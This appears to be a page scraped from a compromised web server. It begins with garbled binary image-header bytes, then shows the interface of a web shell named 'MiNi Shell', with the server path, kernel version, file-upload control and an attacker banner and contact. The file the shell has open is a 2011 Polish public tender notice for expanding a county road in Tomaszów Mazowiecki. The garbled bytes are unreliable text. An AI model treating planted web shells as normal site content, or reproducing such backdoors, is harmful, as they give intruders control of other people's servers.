JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111216/429582-N-2011.html

<p class="kh_header"><b>Lubochnia: Rozbudowa ulicy P.O.W. w Tomaszowie Mazowieckim
(droga powiatowa nr 4332E)</b><br>
<b>Numer ogłoszenia: 429582 - 2011; data zamieszczenia: 16.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Tomaszowie Mazowieckim z/s w Jakubowie , 97-217 Lubochnia, woj. łódzkie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat-tomaszowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa ulicy P.O.W. w Tomaszowie Mazowieckim
(droga powiatowa nr 4332E).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie następujących robót, zgodnie z posiadaną przez Zamawiającego dokumentacja projektowo - kosztorysową:

1.	Roboty rozbiórkowe (nawierzchnie) - 1165.4 m3
2.	Roboty rozbiórkowe (chodniki, krawężniki) - 272.8 m3
3.	Podbudowa pomocnicza jezdni z kruszywa łamanego - 4530 m2
4.	Podbudowa zasadnicza jezdni z betonu asfaltowego - 4530 m2
5.	Nawierzchnia z betonu asfaltowego - 5430 m2
6.	Chodniki z kostki betonowej na podbudowie z gruntu stab. cem. - 1941 m2
7.	Nawierzchnia zjazdów z kostki betonowej na podbudowie z kruszywa łamanego - 174 m2
8.	Krawężniki betonowe na ławie betonowej - 715 m
9.	Obrzeża betonowe - 186 m
10.	Przebudowa schodów terenowych - 10 m2
11.	Oznakowanie poziome - 820 m2
12.	Oznakowanie pionowe - 15 szt.
13.	Bariery łańcuchowe - 120 m
14.	Urządzenie trawników - 204 m2
15.	Kolektory deszczowe odwodnienia z rur PVC śr. 400 mm i 315 mm - 370 m
16.	Przykanaliki kan. deszczowej z rur PVC śr. 200 mm - 56 m
17.	Studnie rewizyjne odwodnienia 1200 mm - 7 szt.
18.	Studzienki osadnikowe 500 mm z wpustem ulicznym - 24 szt.
19.	Montaż słupów oświetleniowych - 8 szt.
20.	Wymiana i budowa linii zasilających oświetlenie - 138 m
21.	Przełożenie kolidujących linii kablowych SN - 405 m
22.	Przeniesienie kolidujących studni teletechnicznych - 2 szt.
23.	Przełożenie kolidującej kanalizacji teletechnicznej - 90 m
24.	Przełożenie kolidujących linii kablowych - 259 m
25.	Wykonanie geodezyjnej inwentaryzacji powykonawczej
26.	Wdrożenie i utrzymanie tymczasowej organizacji ruchu (dla 2 etapów)
27.	Montaż tablic promocyjnych - 2 szt.


Szczegółowy zakres robót (przedmiar) stanowi załącznik nr 9 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje dokonanie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo Zamówień Publicznych z dnia 29 stycznia 2004 roku.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi udokumentować, że posiada doświadczenie w wykonywaniu zamówień o podobnym charakterze i złożoności tj. zrealizował w okresie ubiegłych 5 lat od daty składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 zadanie polegające na przebudowie (rozbudowie) drogi publicznej lub niepublicznej o wartości co najmniej 1,5 mln złotych brutto wraz z przebudową urządzeń infrastruktury towarzyszącej w co najmniej dwóch z trzech następujących branż:
a)	kanalizacji deszczowej lub sanitarnej,
b)	sieci elektroenergetycznej (przebudowa linii kablowych n/n oraz oświetlenia ulicznego),
c)	sieci teletechnicznej (przebudowa linii doziemnych),
z podaniem ich wartości oraz daty i miejsca wykonania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wytwórnia (otaczarka) o mieszaniu cyklicznym z możliwością dozowania środków adhezyjnych i stabilizatorów o wydajności min. 50 Mg/h - 1szt.

walec gładki wibracyjny min. 10 t -2 szt

walec gładki statyczny min. 10 t - 2 szt

walec ogumiony - 1 szt.

samochód dostawczy - 1szt.

samochód samowyładowczy - 2 szt.

układarka mas bitumicznych 
z elektronicznym sterowaniem równością i grubością (szer. urządzenia robocz. do 6.0 m) - 1 szt

szczotka mechaniczna - 1szt

skrapiarka do bitumu - 1 szt

piła do cięcia asfaltu - 1 szt

koparka podsięb. o poj. łyżki min. 0.25 m3 - 1 szt

zagęszczarka spalinowa (ubijak) - 2 szt.

spycharka gąsienicowa min 75 KM - 1 szt.

żuraw samochodowy nośność min. 3 Mg - 1szt.

malowarka drogowa do linii i strzałek - 1szt

równiarka drogowa - 1szt

koparka podsięb. o poj. łyżki min. 0.40 m3 - 1 szt.

zgrzewarka do zgrzewania czołowego rur PE - 1szt.

zgrzewarka do zgrzewania elektrooporowego rur PE - 1szt.

prościarka do rur PE - 1szt.

urządzenie przeciskowe - 1szt.

zestaw dłużycowy - 1szt.

spawarka transformatorowa do 500A - 1szt.

pompa wysokociśnieniowa hydraul. min 250 atm. - 1 szt.

wibromłot - 1 szt.

dźwignik hydraul. przenośny spalinowy min. 250 Mg - 1szt.

wciągarka mechaniczna 3-5 t - 1szt.

samochód specjalny linowy z platformą i balkonem - 1szt.

zespół prądotwórczy trójfazowy przewoźny do 20 kVA - 1szt.

sprężarka powietrza przewoźna spalinowa 4-5 m3/min - 1szt.

zrywarka przyczepna - 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	kierownik budowy - osoba posiadająca następujące kwalifikacje i doświadczenie: samodzielne kierowanie robotami budowlanymi na stanowisku kierownika budowy przy realizacji robót drogowych - co najmniej 6 lat, uprawnienia budowlane w specjalności drogowej bez ograniczeń do kierowania robotami budowlanymi;
b)	kierownik robót drogowych - osoba posiadająca następujące kwalifikacje i doświadczenie: samodzielne kierowanie robotami budowlanymi na stanowisku kierownika budowy lub kierownika robót przy realizacji robót drogowych - co najmniej 3 lata, uprawnienia budowlane w specjalności drogowej bez ograniczeń do kierowania robotami budowlanymi;
c)	kierownik robót instalacyjnych (sieci kanalizacji sanitarnej i deszczowej): osoba posiadająca następujące kwalifikacje i doświadczenie: samodzielne kierowanie robotami budowlanymi których przedmiotem było wykonanie elementów sieci kanalizacji deszczowej lub sanitarnej na stanowisku kierownika budowy lub kierownika robót - co najmniej 3 lata, uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych bez ograniczeń do kierowania robotami budowlanymi;
d)	kierownik robót w specjalności telekomunikacyjnej: osoba posiadająca następujące kwalifikacje i doświadczenie: samodzielne kierowanie robotami których przedmiotem była realizacja robót teletechnicznych na stanowisku kierownika budowy lub kierownika robót - co najmniej 3 lata, uprawnienia budowlane w specjalności telekomunikacyjnej bez ograniczeń do kierowania robotami budowlanymi;
e)	kierownik robót instalacyjnych (sieci, instalacje i urządzenia elektryczne i elektroenergetyczne): osoba posiadająca następujące kwalifikacje i doświadczenie: samodzielne kierowanie robotami budowlanymi których przedmiotem było wykonanie sieci oraz instalacji urządzeń elektrycznych i elektroenergetycznych, w tym oświetlenia drogowego, na stanowisku kierownika budowy lub kierownika robót - co najmniej 3 lata, uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń do kierowania robotami budowlanymi.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zaistnienia szczególnych okoliczności akceptowanych przez zamawiającego, których nie można było przewidzieć w chwili zawarcia umowy, zamawiający dopuszcza dokonywanie zmian postanowień zawartej umowy w stosunku do treści oferty, a w szczególności co do terminu realizacji zamówienia oraz jego zakresu rzeczowego. Takimi okolicznościami są w szczególności: 

a)	siła wyższą, np. warunki atmosferyczne, wystąpienie klęsk żywiołowych,
b)	 nieprzewidywalne działania władz państwowych
c)	zmiany Wykonawcy w związku z sukcesją generalną, przekształceniami, dziedziczeniem spółek handlowych zgodnie z KSH, a także sukcesją z mocy prawa;
d)	zmiany danych osobowych lub adresowych Wykonawcy;
e)	zmiany przedstawicieli stron umowy;
f)	zmiany osób nadzorujących ze strony Zamawiającego i Wykonawcy -kierownik robót</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-tomaszowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Tomaszowie Mazowieckim, Jakubów 19/21,97-217 Lubochnia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2011 godzina 09:00, miejsce: Zarząd Dróg Powiatowych w Tomaszowie Mazowieckim, Jakubów 19/21,97-217 Lubochnia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie realizowane w ramach Narodowego Programu Przebudowy Dróg Lokalnych Etap II Bezpieczeństwo - Dostępność - Rozwój.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com